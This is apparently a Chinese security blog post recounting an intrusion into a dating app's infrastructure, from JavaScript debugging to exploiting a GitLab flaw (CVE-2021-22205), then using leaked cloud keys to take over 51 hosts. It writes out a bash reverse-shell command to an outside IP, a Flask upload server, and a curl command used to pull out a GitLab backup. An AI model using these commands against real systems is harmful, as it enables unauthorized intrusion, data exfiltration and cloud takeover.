实战 | js突破拿下整个云
2024-1-19 12:3:41 Author: 白帽子左一(查看原文) 阅读量:47 收藏

扫码领资料

获网安教程

本次分享主要是分享一次HC中的思路,值得大家学习,服务器已经交给相关部门进行取证等也已经打包结A了

首先给到一个资产是二维码,是一张sese图片里面带有约炮的app下载,扫码后得到如下结果

得到如下结果
https://www.target.com
后进行访问主站

注册成功后发现全是妹子(........),这个时候先别急,咱第一步先去看他调用的JS资源
随便点击一个资源然后刷新一下看他F12网络

这里首先我只能用当时留下的毫无关联的图片进行演示了,当时我看到的JS文件叫 "MyProfile"

这个凭借个人感觉就是个关键信息(我的资料 - > 配置信息?),

所以凭借这些理由,我在XHR中锁定了"MyProfile"这个关键字进行JS断点

然后刷新进行调试 在漫长的调试过程中我发现在一个很奇怪的JS文件中调用了我的MyProfile字段 叫/assets/index-xxxxxx.js

一般来说我就会去审计一下这个JS文件 结果发现好东西了

bindgen: "git+http://123.123.123.123:1111/target2/a.git#0.0.14"

我当时就立刻去访问了一下 发现竟然是一个gitlab!

找了一下历史漏洞 直接 CVE-2021-22205 直接梭哈 成功拿到shell

由于是执行命令,所以写了shell反弹

echo 'bash -i >& /dev/tcp/123.123.123.123/1111 0>&1' > /tmp/haha.sh
chmod +x /tmp/haha.sh
/bin/bash /tmp/haha.sh

成功反弹shell

发现是ubunto的16.04 但是本地提权失败,找了SUID也没有办法,想尽了各种办法都没办法提权,打算放弃了,所以接下来就是去寻找Git权限能做的操作,找了一个下午,最终找到了backups目录里下找到了一个backup的tar包,应该八成就是gitlab上的备份了

但是问题来了,我怎么做到在我反弹shell中把文件拖出来了呢?scp等都试过了不行,于是乎我就写了个flask的上传页面让shell去curl一下把文件post上来(感觉这思路骚的)

我的服务器

from flask import Flask,request
import os

app = Flask(__name__)

@app.route('/upload',methods=['POST'])
def upload_file():
file = request.files.get('file')
if file :
filename = file.filename
file.save(os.path.join(os.getcwd(),filename))
return f"File {filename} saved successfully"
else:
return "worry"

if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True,port=5000)

受控主机shell

curl -X POST http://123.123.123.123:1111/upload -F file=@./a.gitlab_backup.tar

几个G,下载漫长的很呢

然后拖到本地后应该就是gitlab的备份了,(因为他备份文件名字中带有gitlab的版本号)要用到对应的gitlab的相应版本去搭建,然后本地搭建导入备份后慢慢的寻找一些有用信息,后面突然发现一个叫application.yaml的文件 进行审计后泄露了ak和sk(这开发倒是备份挺明白的全部都写清清楚楚)


这个时候行云管家一把梭哈,因为权限很大,接管整个云了,总共是51台主机都拿下了

思路就是 :打点 -> JS文件断点调试 ->新突破上shell-> 解决困难-> 发现新大陆(本地搭建)-> 接管云,最后全部打包好给了JF,也进行取证立A了,到此因为一个JS文件拿下整个云结束了,思路可以学习一波。

文章来源:https://xz.aliyun.com/t/12698文章作者:Jack

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@
学习更多渗透技能!体验靶场实战练习

hack视频资料及工具

(部分展示)

往期推荐

【精选】SRC快速入门+上分小秘籍+实战指南

爬取免费代理,拥有自己的代理池

漏洞挖掘|密码找回中的套路

渗透测试岗位面试题(重点:渗透思路)

漏洞挖掘 | 通用型漏洞挖掘思路技巧

干货|列了几种均能过安全狗的方法!

一名大学生的黑客成长史到入狱的自述

攻防演练|红队手段之将蓝队逼到关站!

巧用FOFA挖到你的第一个漏洞

看到这里了,点个“赞”、“再看”吧

文章来源: http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247605167&idx=1&sn=b2d7695d1b7a70560c61ae2046fc7c0d&chksm=ea15d15d633c9365e704632b2e17da886ac67acd74850b70e421b1a224ad59d5d36bd3ae9169&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh